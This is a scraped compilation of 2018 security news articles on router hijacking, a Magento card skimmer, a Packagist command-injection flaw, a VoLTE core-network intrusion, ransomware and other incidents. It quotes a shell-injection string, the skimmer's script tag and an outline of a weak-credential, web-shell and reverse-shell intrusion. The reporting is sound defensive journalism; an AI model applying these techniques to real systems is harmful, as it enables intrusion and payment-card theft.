Now experts from the security firm Qihoo 360 Netlab discovered more than 7,500 MikroTik routers that have been compromised to enable Socks4 proxy maliciously, allowing attackers to hijack the traffic of the hacked devices.

“What’s more, we have observed massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.” reads the analysis published by Qihoo 360 Netlab.

“More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.”

According to the researchers, since Mid-July the hackers are exploiting the CVE-2018-14847 vulnerability in MikroTik routers to carry out the attacks.

The CVE-2018-14847 flaw was first revealed by WikiLeaks as part of the CIA Vault7 dump, the code for the exploitation of the issue was included in the hacking tool Chimay Red.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

Communication ports associated with the Winbox and Webfig are TCP/8291, TCP/80, and TCP/8080.

The researchers scanned the Internet for vulnerable devices, they found more than 5,000K devices with open TCP/8291 port, and 1,200k of them are Mikrotik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.

Summarizing, more than 370,000 of 1.2 million MikroTik routers are still vulnerable to the CVE-2018-14847 exploit because owners have not updated them.

Most of the vulnerable devices are located in Brazil, Russia, and Indonesia.

Mikrotik routers vulnerable

Netlab experts have detected a malware exploiting the CVE-2018-14847 vulnerability in the Mikrotik routers to perform a broad range of malicious activities, including traffic hijacking and CoinHive mining code injection.

The analysis shared by the experts includes the attack scenarios.

CoinHive Mining Code Injection
Once enabled the Mikrotik RouterOS HTTP proxy, the attackers hijack the HTTP proxy requests to a local HTTP 403 error page which injects a link for web mining code from Coinhive. Anyway the mining code used in this way cannot work because all the external web resources, including ones, are blocked by the proxy ACLs set by attackers themselves.”

Maliciously Enabling Sock4 Proxy
The attackers enabled the Socks4 port or TCP/4153 on victims device, in this way the attacker gain persistence on the router even after it has been rebooted (IP change) by periodically reporting its latest IP address to the attacker’s URL.

“a total of 239K IPs are confirmed to have Socks4 proxy enabled maliciously. The Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block” states the report

“In order for the attacker to gain control even after device reboot(ip change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL.”

Experts pointed out that all the 239,000 IP addresses only allow access from, actually mainly from the address.

The MikroTik RouterOS devices to capture packets on the router and forward them to the specified Stream server, this feature could be abused by attackers to forward the traffic to IP addresses controlled by them. Experts noticed that a significant number of devices have their traffic going to the IP.

Don’t waste time, update the MikroTik devices and also check if the HTTP proxy, Socks4 proxy, and network traffic capture function are being abused by attackers.

Google paid million dollars to track offline purchases using Mastercard Data
4.9.2018 securityaffairs CyberCrime

Google has paid Mastercard millions of dollars to access offline transactions of its users, the news was revealed by Bloomberg.
New problems for Google, experts discovered a secret agreement of the tech giant with Mastercard to track user purchases offline.

Google has paid Mastercard millions of dollars to access offline transactions of its users.

The embarrassing agreement was revealed by Bloomberg that cited four unidentified people with knowledge of the deal.

Google used Mastercard data to track whether its ads led to a sale at a physical store in the U.S.

Google and Mastercard signed the agreement after a four-year negotiation, it gives the company all Mastercard transaction data in the US.

Neither Mastercard or Google have never disclosed the deal, roughly two billion Mastercard holders aren’t aware that Big G was tracking them.

“Alphabet Inc.’s Google and Mastercard Inc. brokered a business partnership during about four years of negotiations, according to four people with knowledge of the deal, three of whom worked on it directly.” reads the report published by Bloomberg.

“The alliance gave Google an unprecedented asset for measuring retail spending, part of the search giant’s strategy to fortify its primary business against onslaughts from Inc. and others.”

Google used the data to fuel a new tool for advertisers, called Store Sales Measurement, that is currently in a test phase for a restricted group of advertisers. The tool aims at tracking the conversion rate of online advertisements into real-world retail sales.

Google never revealed that the source of data used by its Store Sales Measurement service since its presentation, the company only declared that its customers had access to approximately 70% of U.S. credit and debit cards through partners.

“People don’t expect what they buy physically in a store to be linked to what they are buying online,” said Christine Bannan, counsel with the advocacy group Electronic Privacy Information Center (EPIC).

“There’s just far too much burden that companies place on consumers and not enough responsibility being taken by companies to inform users what they’re doing and what rights they have.”

This suggests that not just Mastercard, Google has deals with other credit card companies as well, which total of 70% of the people who use credit and debit cards in the United States.

However, it seems that users can reportedly opt out of offline ad tracking by merely turning off “Web and App Activity” in their Google account.

Mastercard denied that it has provided personal information to any third parties.

“Regarding the [Bloomberg] article you cited, I’d quickly note that the premise of what was reported is false. The way our network operates, we do not know the individual items that consumer purchases in any shopping cart—physical or digital.” a Mastercard spokesperson said in a statement:

“No individual transaction or personal data is provided. That delivers on the expectation of privacy from both consumers and merchants around the world. In processing a transaction, we see the retailer’s name and the total amount of the consumer’s purchase, but not specific items.”

Compromising Proxy Call Session Control Function (P-CSCF) using VoLTE
4.9.2018 securityaffairs Hacking

The IP Multimedia Subsystem (IMS) facilitates telecom operators in delivering multimedia applications and voice traffic over IP transport. Proxy Call Session Control Function (P-CSCF) is the first node in IMS Platform (figure 1) to interact with the User Equipment (UE) when initiating a VoLTE call. P-CSCF
figure 1 – Placement of Proxy Call Session Control Function in IMS Platform
Identify and Compromise Proxy Call Session Control Function with VoLTE phone:
1) Initiate a call with VoLTE phone and simultaneously open phone’s terminal to list currently established sessions. It was possible to identify the IP address of serving P-CSCF node, connected on port 5060 (figure 2).

figure 2 – Identifying P-CSCF node connected on port 5060 (SIP protocol)
2) Management console of an application server and Proxy Call Session Control Function application (figure 3 & figure 4) were found by performing a service scan on identified IP address.

figure 3 – P-CSCF applications’s management console
figure 4 – Application server’s management console
3) Application server, Oracle Glassfish, was found to be weakly configured and could be accessed using weak credentials (figure 5).

figure 5 – Access to Oracle Glassfish server using weak credentials
4) A reverse shell was triggered using a web shell and gained root access of the P-CSCF node (figure 6).

figure 6 – Gained root access to P-CSCF (IMS)
After gaining access to the IMS platform, Attacker can compromise other core telecom components in the network.

To prevent such attacks, telecom operators should ensure traffic segregation between user plane, control plane, and management plane. It is highly recommended to patch all the core network elements with the latest security patches released by the vendor. Also, develop and implement minimum security guidelines before integrating nodes in the network.

Hope you enjoyed reading, suggestions are always welcome.

The original post is available at:

Parental control spyware app Family Orbit hacked, pictures of hundreds of monitored children were exposed
4.9.2018 securityaffairs Hacking

The company that sells the parental control spyware app Family Orbit has been hacked, pictures of hundreds of monitored children were left online.
The company that sells the parental control spyware app Family Orbit has been hacked, the pictures of hundreds of monitored children were left online only protected by a password.

According to Motherboard that first reported the news, the Family Orbit spyware left exposed nearly 281 GB of data online. The hacker discovered the huge trove of data that was stored on an unsecured server and reported the discovery to Motherboard. The hacker found the key on the cloud servers of the spyware app.

“A company that sells spyware to parents left the pictures of hundreds of monitored children online, only protected by a password that almost anyone could find, according to a hacker.” states Motherboard.

“The hacker, who’s mainly known for having hacked spyware maker Retina-X, wiping its servers (twice), said he was able to find the key to the cloud servers of Family Orbit, a company that that markets itself as “the best parental control app to protect your kids.” The servers contained the photos intercepted by the spyware, according to the hacker. The company confirmed the breach to Motherboard.”

Family Orbit spyware

Experts found a Rackspace with about 3,836 containers that also included video footages.

“I had all photos uploaded from the phones of kids being monitored, and also some screenshots of the developer’s desktops which exposed passwords and other secrets,” stated the unidentified hacker.

Motherboard also verified the data breach and stated that the data belonged to active users who used those email addresses to register to the service. Motherboard assessed 6 of the email addresses and concluded that the addresses were active.

The data was protected by an easy-to-guess password only. He found the key on the cloud servers of the spyware app.
The hacker who discovered the unprotected server is the same who hacked the server of another spyware, Retina-X, two times.

The company confirmed the data breach to Motherboard, its representative told Motherboard that the API key is stored encrypted in the app, and that the company observed “unusual bandwidth” used in their cloud storage.

“We have immediately changed our API key and login credentials. The sales and the services have been taken offline until we ensure all vulnerabilities are fixed,” the representative said via email.

The incident is not isolated, companies that sell spyware are a privileged target of hackers that protest against the abuse of technology for surveillance purposes.

In the last 18 months, other eight companies that sell spyware have been hacked, they are FlexiSpy, Retina-X, TheTruthSpy, Mobistealth, Spy Master Pro, Spyfone and SpyHuman.

Critical remote code execution flaw patched in Packagist PHP package repository
4.9.2018 securityaffairs

Maintainers of Packagist, the largest PHP package repository, have recently addressed a critical remote code execution vulnerability.
Packagist is the default package host behind Composer, it has over 435 million package installs.

The vulnerability was reported by the security researcher Max Justicz, the expert discovered that the “Submit Package” input field for submitting new PHP packages via the package repository homepage allowed an attacker to execute a malicious command in the format of “$(execute me)”.

“You could type $(execute me) into a big text field on the site and it would execute your command in a shell (twice).” reads the security advisory published by the expert.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,”


The expert pointed out that when a user provided an URL to Packagist it was improperly escaping the input allowing ill-intentioned to execute any commands in a shell (twice).

The mitigation was simple, the maintainers of the Packagist repository simply implemented the escaping functionality for the relevant parameters in the Composer repository.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” explained Justicz.

The expert warned of the low level of security implemented for the Package manager that could open the doors to future attacks.

“Package manager security is not always great, and you should probably plan on your package manager servers being compromised in the future. In the past year or so I have found bugs that let me execute arbitrary code on, execute code on some of npm’s official mirrors (not the main registry), delete arbitrary release files from PyPI, serve arbitrary JS on every site using a popular CDN for npm, and now execute arbitrary code on” concludes the expert.

“I think it is a security anti-pattern to have application build pipelines pull fresh downloads of packages from upstream servers on every build if the packages are not expected to change. If for some reason you have to do this, you should pin dependencies using a cryptographically secure hash function.”

Kaspersky warns of a new Loki Bot campaign target corporate mailboxes
4.9.2018 securityaffairs BotNet

Security experts from Kaspersky Lab have uncovered a new spam campaign leveraging the Loki Bot malware to target corporate mailboxes.
The Loki Bot attacks started in July and aimed at stealing passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets

Loki Bot operators employ various social engineering technique to trick victims into opening weaponized attachments that would deploy the Loki Bot stealer.

The messages use attachments with .iso extensions, a type of file that worked as a container for delivering malware.

“Starting from early July, we have seen malicious spam activity that has targeted corporate mailboxes. The messages discovered so far contain an attachment with an .iso extension that Kaspersky Lab solutions detect as Loki Bot.” reads the analysis published by Kaspersky.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners.”

The messages masquerade as notifications from other companies, or as orders and offers.

Threat actors are sending out copies of Loki Bot to company email addresses that were available on public sources or from the companies’ own websites.

Loki Bot

Experts observed different spam messages including fake notifications from well-known companies, fake notifications containing financial documents, and fake orders or offers.

Researchers highlighted the importance for organizations of adopting security measures that include both technical protections and training for employees.

“Every year we observe an increase in spam attacks on the corporate sector.” Kaspersky concludes.

“The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc.”

MagentoCore skimmer already infected 7,339 Magento stores
4.9.2018 securityaffairs Cryptocurrency

MagentoCore skimmer already infected 7,339 Magento stores, according to the Willem de Groot who uncovered the campaign, it is the most aggressive to date.
The cybersecurity researcher Willem de Groot has uncovered a massive hacking campaign aimed at Magento stores. The hackers have already infected 7,339 Magento stores with a skimmer script, dubbed MagentoCore, that siphons payment card data from users who purchased on the sites.

Threat actors behind this campaign managed to compromise the websites running Magento and injected the payment card scraper in its source code.

Crooks attempts to access the control panel of Magento stores with brute force attacks.

At the time of writing, querying the PublicWWW service we can verify that the MagentoCore script is currently deployed on 5,214 domains.

The malicious script loads on store checkout pages and steals payment card details provided by the users and send it to a server controlled by the attacker.
Willem de Groot reported that the hacking campaign is involving a skimmer script loaded from the domain.

“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.

MagentoCore credit card stealer Reinfector

The expert found the MagentoCore script on 7,339 Magento stores in the past six months, the campaign is still ongoing and hackers are compromising new Magento stores at a pace of 50 to 60 sites per day.

“The average recovery time is a few weeks, but at least 1450 stores have hosted the parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.

Once the attackers succeed in compromising a website, it will add an embedded piece of Javascript to the HTML template:

<script type="text/javascript" src="hxxps://"></script>
This script records keystrokes from customers and sends them to “” server.

The expert noticed that the malware implements a recovery mechanism, in case of the Magento software, it adds a backdoor to cron.php that will periodically download the malicious code, and, after running, delete itself.

“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.

“But the real victims are eventually the customers, who have their card and identity stolen.”

According to Bleeping Computer that quoted Yonathan Klijnsma, Threat Researcher Lead for RiskIQ, the MagentoCore campaign is actually part of a larger card scraping campaign known as MageCart that been active since late 2015.

According to de Groot, currently, 4.2% of all Magento stores are infected with one or more skimmer scripts.

Willem de Groot
@gwillem skimmer planted on 7337 stores; removes competing skimmers; periodically resets admin passwords to "how1are2you3" …

12:58 PM - Aug 30, 2018 · The Hague, The Netherlands
See Willem de Groot's other Tweets
Twitter Ads info and privacy

Willem de Groot
4.2% of all Magento stores globally are currently leaking payment and customer data

2:55 PM - Aug 27, 2018
29 people are talking about this

John McAfee’s Bitfi cryptocurrency wallet was hacked by a security duo
4.9.2018 securityaffairs Hacking

A security duo composed of Saleem Rashid and Ryan Castellucci demonstrated that it is possible to hack the John McAfee’s Bitfi cryptocurrency wallet.
Today let’s discuss John McAfee’s cryptocurrency wallet, the Bitfi wallet, defined by the popular cyber security expert “unhackable.”

Unfortunately, nothing is unhackable, and the Bitfi wallet was already hacked two times.

The Bitfi wallet is an Android-powered hardware device for storing cryptocurrencies and crypto assets.

A team of security researchers called THCMKACGASSCO devised a new attack that could allow them to steal all the stored funds from an unmodified Bitfi wallet.

The wallet relies on a user-generated secret phrase and a “salt” value to cryptographically scramble the secret phrase. The experts who devised the attack explained that the secret phrase and salt can be obtained allowing the attackers to generate the private keys and stole the funds.

“The Android-powered $120 wallet relies on a user-generated secret phrase and a “salt” value — like a phone number — to cryptographically scramble the secret phrase. The idea is that the two unique values ensure that your funds remain secure.” reported

“But the researchers say that the secret phrase and salt can be extracted, allowing private keys to be generated and the funds stolen”

The security duo composed of Saleem Rashid and Ryan Castellucci, members of a the THCMKACGASSCO, developed the exploits for the attack and published a video PoC for the hack. In the video PoC is shown that setting a secret phrase and salt, and running a local exploit, it is possible to extract the keys from the device.

The video shows the attack can take less than two minutes to be executed.

Saleem "Unhackable" Rashid
· Aug 30, 2018
Bill Powell of @Bitfi6 discussing the single assumption upon which the entirety of @Bitfi6's ridiculous UNHACKABLE claim lies

could you even IMAGINE if this assumption was proved false? …

View image on Twitter

Saleem "Unhackable" Rashid
on a completely unrelated note, here is a @Bitfi6 being cold boot attacked.

it turns out that rooting the device does not wipe RAM clean. who would have thought it!?

🎶 i feel this music is very appropriate for @Bitfi6 🎶

10:53 PM - Aug 30, 2018

209 people are talking about this
Twitter Ads info and privacy
Rashid explained that they discovered that the keys are stored in the memory longer than Bitfi claims. The experts have devised a technique to run code on the hardware wallet without erasing the content of memory that included the keys, then they were able to extract the content of the m2mory including the keys.

The bad news is that the attack is trivial to carry out and doesn’t require any specific hardware as explained by Andrew Tierney, a security researcher with Pen Test Partners who verified the new attack.

Tierney was one of the members of the hacking team that carried out the first Bitfi attack.

Ask Cybergibbons!
Well, that's a transaction made with a MitMed Bitfi, with the phrase and seed being sent to a remote machine.

That sounds a lot like Bounty 2 to me.

2:51 PM - Aug 13, 2018
101 people are talking about this
Twitter Ads info and privacy
McAfee offered a $250,000 bounty for anyone who could successfully carry out an attack on the wallet that will result with the theft of the coins.

Bitfi did not pay out the bug bounty because the attack demonstrated by the researchers was outside the scope of the bounty.

John McAfee

The press claiming the BitFi wallet has been hacked. Utter nonsense. The wallet is hacked when someone gets the coins. No-one got any coins. Gaining root access in an attempt to get the coins is not a hack. It's a failed attempt. All these alleged "hacks" did not get the coins.

8:17 PM - Aug 3, 2018
655 people are talking about this
Twitter Ads info and privacy

Matthew Green
I haven’t really been following this Bitfi nonsense, but I do so love when companies threaten security researchers.

1:39 PM - Aug 6, 2018
149 people are talking about this
Twitter Ads info and privacy

Differently from the first hack, this second one demonstrated by the security duo seems to in scope for the bug bounty.

Bill Powel, vice president of operations at Bitfi, told TechCrunch in an email that the company defines a hack “as anything that would allow an attacker to access funds held by the wallet.”

After the researchers published the video PoC of the attack, Bitfi announced to have hired an experienced security manager, who is confirming vulnerabilities that have been identified by researchers.

184 people are talking about this
Twitter Ads info and privacy
Rashid will not publicly disclose the exploit code to avoid hackers using it.

Wireshark fixed three flaws that can crash it via malicious packet trace files
4.9.2018 securityaffairs

The Wireshark team has addressed three serious vulnerabilities that could be exploited by a remote unauthenticated attacker to crash the analyzer.
The Wireshark development team has fixed three serious flaws that could be exploited by a remote unauthenticated attacker to trigger a DoS condition in the world’s most popular network protocol analyzer.

The three vulnerabilities tracked as CVE-2018-16056, CVE-2018-16057 and CVE-2018-16058 affect respectively the Bluetooth Attribute Protocol (ATT) dissector, the Radiotap dissector, and the Audio/Video Distribution Transport Protocol (AVDTP) dissector components of Wireshark.

A proof-of-concept (PoC) code exploit for each flaw is publicly available, the vulnerabilities are trivial to exploit, an attacker can exploit the vulnerabilities by injecting a malformed packet into a network. The attackers have to trick the victim into opening a malicious packet trace file.

“To exploit the vulnerability, the attacker may use misleading language and instructions to convince a user to open a malicious packet trace file.” reads the security advisory published for the CVE-2018-16057 flaw.

“To inject malformed packets that the Wireshark application may attempt to parse, the attacker may need access to the trusted, internal network where the targeted system resides. This access requirement may reduce the likelihood of a successful exploit.”

Anyway, to trigger the flaw it is necessary to access to a malicious packet trace file, a circumstance that makes the likelihood of exploitation very low.


Wireshark users need to upgrade their install to one of these: 2.6.3, 2.4.9, or 2.2.17.

Below the list of safeguards provided by Cisco in the security advisory:

Administrators are advised to apply the appropriate updates.
Administrators are advised to allow only trusted users to have network access.
Administrators are advised to run both firewall and antivirus applications to minimize the potential of inbound and outbound threats.
Administrators may consider using IP-based access control lists (ACLs) to allow only trusted systems to access the affected systems.
Administrators can help protect affected systems from external attacks by using a solid firewall strategy.
Administrators are advised to monitor affected systems.

The cyber threat against Danish financial sector is very high
4.9.2018 securityaffairs Cyber

A report published by the Centre for Cyber Security (Center for Cybersikkerhed) states that the threat to the Danish financial sector is very high.
According to a report by the Centre for Cyber Security (Center for Cybersikkerhed), a department of military security agency FET (Forsvarets Efterretningstjeneste), the cyber threat against the Danish financial sector is very high.

The centre monitors the attacks against Denmark and Danish businesses.

“The threat posed to the Danish financial sector by cyber crime is very high,” reads the report published by the centre.

The threat is “becoming increasingly advanced and complex, and cyber attacks can disrupt the access to Danish financial sector services,”

The centre warns of a specific threat with “capacity, intention, planning and possible implementation. Attack/damaging activity is very likely.”

The government experts believe that the cyber espionage represents one of the main threat for the country and its businesses.

Digital espionage is also considered to be a high area of risk, according to the report.

“It is likely that foreign states have both political and economic interest in conducting cyber espionage against the Danish financial sector,” continues the report.

It is interesting to note that the Government centre classifies the threat of cyber terrorism to the financial industry as low.

“But the report also found only a low threat of cyber terror, in which cyber attacks would aim to completely bring down financial systems in Denmark. states The Local news agency.

Finans Danmark, a representative organisation for the financial sector, said it recognised the level of cyber threat described by the agency report.”

Danish financial sector

Cybercriminal organizations focused on banks are intensifying their actions and their operations are becoming even more sophisticated. In the last years, security experts have monitored the activities of several threat actors specialized in attacks aimed at the financial sector and their customers.

“As the systems at banks become stronger, so too do the methods used by cyber crimials become more advanced, and that requires us to constantly keep up,” Finans Danmark director of digitalisation Michael Busk-Jepsen wrote in a press statement.

“There is no doubt that crime aimed at banks and bank customers via the internet is growing,” Busk-Jepsen added.

TrendMicro links Urpage hacking crew to other threat actors
4.9.2018 securityaffairs Hacking

Last week, security researchers from Trend Micro discovered a new threat actor, tracked as Urpage, that shares similarities with other three hacking crews.
Researchers from Trend Micro linked a recently discovered actor, tracked as Urpage, to the hacking groups known as Bahamut, Confucius, and Patchwork.

Trend Micro first connected the Confucius group to the Patchwork crew in early 2018, then discovered many similarities between the groups.

The Patchwork (aka Dropping Elephant and Chinastrats) was first spotted by Kaspersky Lab in 2016, when the group targeted organizations in multiple industries, The activities of the group are focused on diplomatic and government targets, in some campaigns it also targeted private businesses.

China’s foreign relations efforts appear appeared to represent the main interest of the Patchwork group.

“In this case we dig deeper into the possible connection between cyberattacks by focusing on the similarities an unnamed threat actor shares with Confucius, Patchwork, and another threat actor called Bahamut. For the sake of this report, we will call this unnamed threat actor “Urpage.”” reads the analysis published by Trend Micro.

“What sets Urpage attacks apart is its targeting of InPage, a word processor for Urdu and Arabic languages. However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware, is what makes it more intriguing as it connects Urpage to these other known threats.”

Back to the present, the Urpage hackers target InPage word processor used for Urdu and Arabic languages for both Windows and Mac systems. The attackers leverage a Delphi backdoor that links it to Confucius and Patchwork groups, as well as an Android malware similar to Bahamut one.

The Android malware used by the Urpage group connects its own command and control (C&C) infrastructure.

Some of the C&C websites used by the group also act as phishing sites that lure users into downloading malicious applications.

“The threat actor sets up these fake websites describing the application and linking to the Google Play Store to download it, like in the case of the malicious website, pikrpro[.]eu, seen below” continues the report.

The Urpage malware is a data stealer like the Bahamut applications, it can collect data from the infected host such as network information and the MAC address, it can steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with specific extensions.

Experts noticed that some C&C also host other malicious documents that link the Urpage group to the other groups.


One of the C&Cs was hosting a weaponized RTF file that triggers the CVE-2017-8750 flaw and an InPage file that exploits CVE-2017-12824.

Another similarity between Urpage and the other groups is the use of the same Delphi file stealer.

Concluding, the Urpage appears to be linked to the other threat actors, a link that is very close with the Patchwork group that leverages the same Android application, uses the same the registration pattern for C&C and the infrastructure is close to an old Patchwork domain.

The evidence collected by the experts suggest the attacks conducted by the groups are part of a wider coordinated operation.

“The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere. This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets. We’ve summarized all the mentioned findings in the table below.” concludes Trend Micro.

Arjen Kamphuis, the Dutch associate of Julian Assange, went missing in Norway

4.9.2018 securityaffairs Security

Julian Assange associate and author of “Information Security for Journalists” Arjen Kamphuis has disappeared, the Norwegian police is working on the case.
Media agencies worldwide are reporting the strange disappearance of Arjen Kamphuis, the Julian Assange associate. The news was confirmed by WikiLeaks on Sunday, the man has been missing since August 20, when he left his hotel in the Norwegian town of Bodo.


.@JulianAssange associate and author of "Information Security for Journalists" @ArjenKamphuis has disappeared according to friends (@ncilla) and colleagues. Last seen in Bodø, #Norway, 11 days ago on August 20.

1:43 AM - Sep 1, 2018
2,060 people are talking about this
Twitter Ads info and privacy
According to WikiLeaks, Kamphuis had bought a ticket for a flight departing on August 22 from Trondheim that is far from Bodo.

His friends believe he disappeared either in Bodo, Trondheim or on the way to the destination.


Update on the strange disappearance of @ArjenKamphuis. Arjen left his hotel in Bodø on August 20. He had a ticket flying out of Trondheim on August 22. The train between the two takes ~10 hours, suggesting that he disappeared in within hours in Bodø, Trondheim or on the train.


.@JulianAssange associate and author of "Information Security for Journalists" @ArjenKamphuis has disappeared according to friends (@ncilla) and colleagues. Last seen in Bodø, #Norway, 11 days ago on August 20.

View image on Twitter
3:42 AM - Sep 2, 2018
833 people are talking about this
Twitter Ads info and privacy
“A website set up to gather information on the missing person says: “He is 47 years old, 1.78 meters tall and has a normal posture. He was usually dressed in black and carrying his black backpack. He is an avid hiker.”” reported the German website
At the time of writing, there have been two unconfirmed sightings, one in Alesund, Norway, and the other in Ribe, Denmark.

The Norwegian authorities have started an investigation on the case on Sunday.

“We have started an investigation,” police spokesman Tommy Bech told the news agency AFP. At the time, the police “would not speculate about what may have happened to him,”.


Hi everyone, small update about #FindArjen; The Norwegian police is working hard on the case now. We are keeping all options open, and hoping he will soon be found🤞

11:13 AM - Sep 3, 2018
56 people are talking about this
Twitter Ads info and privacy
According to the Norwegian Verdens Gang tabloid newspaper, the Norwegian authorities cannot access location data collected by the Kamphuis’s mobile phone until he is officially reported missing in the Netherlands.

CryptoNar Ransomware Discovered and Quickly Decrypted

This week a new CryptoJoker ransomware variant was discovered called CryptoNar that has infected victims. The good news, is that a free decryptor was quickly released so that these victims can get their files back for free.

This ransomware was first discovered by MalwareHunterTeam and at first glance it looks like a ransomware with little to no distribution. While I would normally not write about ransomware like these, it was later learned that this ransomware had encrypted close to 100 victims.

Travis Green
Replying to @malwrhunterteam @demonslay335
Looks like 91 infections starting aug 21st.

7:55 PM - Aug 28, 2018
See Travis Green's other Tweets
Twitter Ads info and privacy
The good news is that Michael Gillespie was quick to create a free decryptor for this ransomware so victims can get their files back for free.

The CryptoNar Ransomware
When the CryptoNar, or Crypto Nar, Ransomware encrypts a victims files it will perform the encryption differently depending on the type of file being encrypted.

If the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file's name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file's name.

Files encrypted by CryptoNar
Files encrypted by CryptoNar
When done encrypting the files, it then the sends public/private key pair to the attacker via email.

Send keys via SMTP
Send keys via SMTP
CryptoNar will then drop a ransom note named CRYPTONAR RECOVERY INFORMATION.txt that asks the victim to send $200 in bitcoins to the enclosed bitcoin address. When sending the coins, the attacker instructs the victim to enter their email address and listed ID in the "extra note" field of the bitcoin transaction.

Ransom Note
A decryptor will then be launched and waits for the victim to enter a private key they would supposedly get after paying the ransom.

Crypto Nar Version 1.0

It is not known if the attacker will actually try and help a victim after they pay, but at this point it does not matter as there is a free decryptor available.

Free CryptoNar Decryptor created
The good news is that Michael Gillespie was able to create a free decryptor for CryptoNar that allows victims to get their files back for free.

Michael Gillespie
Here's a free decrypter for CryptoJoker / CryptoNar #Ransomware (extensions ".cryptojoker" / ".cryptoNar"). Just requires either an encrypted/original file, or one encrypted file of a common type (e.g. .jpg, .png, .pdf, .doc, etc). …

1:05 AM - Aug 29, 2018
55 people are talking about this
Twitter Ads info and privacy

To use the decryptor, make sure you have both an encrypted file and its original counterpart and then download the decryptor from looking for encrypted/non-encrypted pairs it can be a common file type such as .jpg, .png, .pdf, .doc, .xls, etc.
When ready, run the decryptor, select Settings, and then select Brute Forcer. Once in the brute forcer, select both of the requested files and click Start. The decryptor will then use the selected files to brute force the decryption key.

When one is found, close the Brute Forcer screen and the key should be loaded. Now click on Select Directory, select the C: drive, and click on the Decrypt button.

Files decrypted
Files decrypted
Your files should now be decrypted.

Third-Party researchers released micropatch for recently disclosed Windows Zero-Day
2.9.2018 securityaffairs

Security researchers from the opatch community released a micropatch for the recently disclosed Windows zero-day vulnerability.
A few days ago, the security researcher who handles the Twitter account @SandboxEscaper has disclosed the details of zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

Microsoft is expected to address the vulnerability in September security Patch Tuesday, that is scheduled for September 11, meantime a patch was released by 0patch, a community of experts that aims at addressing software flaws.

The community is known to develop tiny patches, usually less than 30 bytes in size, it released a fix within 24 hours after the public disclosure of the issue.

The fix for the Windows zero-day recently disclosed is only 13 bytes in size.

Experts explained that they have validated and verified the micropatch for @SandboxEscaper’s LPE in Task Scheduler.

It currently works only to fully updated 64bit Windows 10 1803.
View image on Twitter

· Aug 29, 2018
Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED.

View image on Twitter

Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at

2:19 PM - Aug 30, 2018
40 people are talking about this
Twitter Ads info and privacy
2:19 PM – Aug 30, 2018
View image on Twitter
“As the researcher’s POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” reads the analysis published by 0patch.

“SandboxEscaper’s documentation properly identifies the problem being in Task Scheduler’s SchRpcSetSecurity method, which is externally accessible via Advanced Local Procedure Call (ALPC)facility. “

This is just a temporary fix, Windows users are advised to apply the official Microsoft updates as soon as one becomes available.

0patch warns of unexpected errors that could be caused by the unofficial fix they released.

“Can we keep using this micropatch instead of applying Microsoft’s update?

We strongly recommend against that. Microsoft’s update will not only fix this issue in a more informed way, but will also bring fixes for other vulnerabilities that we don’t have micropatches for. Yes, we hate losing hours of our lives to updating our systems too, but wouldn’t dream of outright replacing official updates with our micropatches 😉 ” concludes oparch.

Fappening case – Another hacker who leaked celebrities naked photos was sentenced to 8 months in prison
2.9.2018 securityaffairs Privacy

Fappening – The hacker George Garofano (26) who leaked celebrities naked photos and attempted to trade them was sentenced to 8 months in prison
The sentence for the fourth hacker involved in the leakage of celebrities naked photos, also known as the Fappening case, has arrived. George Garofano, 26, of North Branford, has been sentenced to eight months in prison, he was charged earlier this year with hacking into over 250 Apple iCloud accounts belonging to Hollywood celebrities.

As part of the Fappening case, nude pictures of many celebrities were leaked online, the list of victims is long and includes Kim Kardashian, Kate Upton, and Jennifer Lawrence.

Garofano had been arrested by the FBI and a federal court has accused him of violating the Computer Fraud and Abuse Act.

From April 2013 through October 2014, Garofano used phishing attacks against the victims to obtain their iCloud accounts credentials, access the accounts and steal personal information, including private photographs and videos.

Garofano also traded the stolen credentials, as well as the information he stole from the victims’ accounts, with other individuals.

In a plea agreement signed in January in U.S. District Court in Los Angeles, Garofano agreed to plead guilty to one count of unauthorized access to a protected computer to obtain information.

Prosecutors requested for the man a sentence of at least 10 to 16 months in prison, while his advocate requested a sentence of no more than ten months, the half of which to under home arrest.

